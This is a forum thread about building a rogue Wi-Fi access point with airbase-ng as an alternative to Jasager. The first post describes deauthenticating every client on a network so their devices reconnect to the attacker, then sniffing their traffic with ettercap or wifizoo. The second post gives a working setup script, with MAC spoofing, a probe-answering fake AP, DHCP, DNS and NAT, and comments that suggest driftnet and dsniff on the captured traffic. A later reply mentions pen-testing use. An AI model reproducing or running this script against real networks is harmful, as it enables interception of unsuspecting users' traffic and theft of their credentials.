Jump to content

airbase-ng = Jasager

Recommended Posts

So after some digging I couldn't find a Fon on the cheap. In doing so a friend recommended I check out airbase-ng which is basically the same thing as Jasager, it accepts probes from wireless devices and lets them connect with any SSID.

After a few days of mentoring I was able to get airbase-ng to work properly and well, its nice not having to worry about carrying a Fon around or wondering when the battery is going to die that supplies it.

This is NOT a slam of Jasager, I still plan on getting a Fon for this complete purpose because it is standalone. I could set up a Jasager + a tiny computer and log stuff. So I just want to get that out of the way. Jasager is pretty amazing and the developer should get donations for his work.

Let me explain what airbase-ng is incase anyone is curious. Airbase-ng is a part of the aircrack-ng suite. You'll find it on the BackTrack3 install. You basically set up a virtual interface (atX) which is run on a rt73 based wireless usb stick.

I simply connect to the legitimate network with my airport on my macbook, boot into BT3 with VMware, and tunnel my airbase access point between the two. This allows you to run ettercap or wifizoo on anyone who connects to your access point. It gets better, with my other stick I de-authenticate all connected clients and when they reconnect they connect to me by default due to their probes.

This is a pretty stealthy hack and I'd be willing to post my script if anyone needs it. I just wanted to share my recent experience with airbase-ng and a big shoutout to jeroenimo for helping me out.


ps my hardware is the asus WL-167G and dwl-122G B1

Link to comment
Share on other sites

Just get yourself a rt73 or rtl8187 based wifi adapter.

Here is the meat of the script.

## needed : dhcpd (set with amentioned settings in script) airbase-ng xterm iptables dnsmasq
#eerst alle services killen die er zouden kunnen draaien

## killall all running services

killall -9 dhcpd airbase-ng dnsmasq

##this prepares the network interface, spoofs the mac
modprobe tun
ifconfig rausb0 down
ifconfig rausb0 hw ether 001122334455

# okee je moet dhcpd geconfigged hebben met een dhcp.conf ik heb zelf gekozen voor range met 


# netmask
## Make sure you have dhcpd setup with as a range with netmask gateway
# installeren van dhcpd weet je wel, kan met apt-get
# ook moet je dnsmasq met apt-get geinstalleerd hebben
# ik mail je ook mijn dhcp.conf waarin de goede settings staan
## make sure you save this dhcpd.conf and run either from within the script this dhcpd.conf:
# option domain-name-servers;

# default-lease-time 360;
# max-lease-time 720;

# authoritative;

# subnet netmask {
# range;
# option routers;
# option domain-name-servers;
# }
# make sure you remove the #'s

## Now we start airbase-ng is a xterm window where you have to edit the -e for the essid, also the interface which here is wlan0 accordingly to you wireless interface

xterm -hold -geometry 96x25+0+0 -e airbase-ng -P -C 5 -e "Private" -c 6 rausb0 &
sleep 7

# Nu hebben we de softap aan gezet, let op -P en -C 15 zorgt er voor dat onze softap op alle client probes reageerd
#  en elke 15 seconden weer broadcasts doet, met andere woorden, als een windows computer naar LutjebroekWifi zoekt dan
#  word automagisch dat ap aangemaakt
# natuurlijk kan je nog spelen met instellingen

## We bring up our at0 iface
ifconfig at0 netmask up
sleep 3

# Nadat de softap draait word er natuurlijk een interface aan gehangen, dit is at0 en die moet up en een ip hebben
# omdat dhcpd is geconfigged op moet at0 natuurlijk wel krijgen.  
## make sure we clean our dhcpd.leases

#echo >  /var/lib/dhcp/dhcpd.leases
echo > /var/state/dhcp/dhcpd.leases

# dhcp effe "leeg maken"
## here we start our dhcp server

dhcpd -cf /root/dhcpd.conf at0

#En dhcpd aanzetten op de at0 interface
## solve our dns forwarder

dnsmasq restart

# dnsmasq effe herstarten voor de zekerheid
## enable ipv4 formwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

# ip forwarding aanzetten omdat onze honeypot wel internet moet geven !
## get iptables to do NAT for us 

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# en met iptables kunnen we gaan NAT'ten
## I have found that I needed to restart the script once before it worked, the dhcpd would fail the first time ran, but works the second time you run the script

# Nu is het leuk om te kijken wat er langs komt
# op at0 kan je driftnet -i at0 zetten
# Ook dsniff -i at0 geeft leuke dingen !
# veel plezier !

This sets up the virtual interface at0 on my backtrack and tunnels it through my macs virtual interface to get the clients to the internet, much the same way your backtrack VM gets internet access through any VM.

EDIT: here is the video http://www.vimeo.com/1852893

Link to comment
Share on other sites

  • 4 weeks later...
So after some digging I couldn't find a Fon on the cheap. In doing so a friend recommended I check out airbase-ng which is basically the same thing as Jasager, it accepts probes from wireless devices and lets them connect with any SSID.

Alternatively you could use karma on the laptop. Jasager is a port of karma to the fon with some additions and some things removed.

Jasager is designed for pen-testing environments where you want to be able to leave a device behind, a few dollar fon is much easier to leave in a reception area and hope to pick up later.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...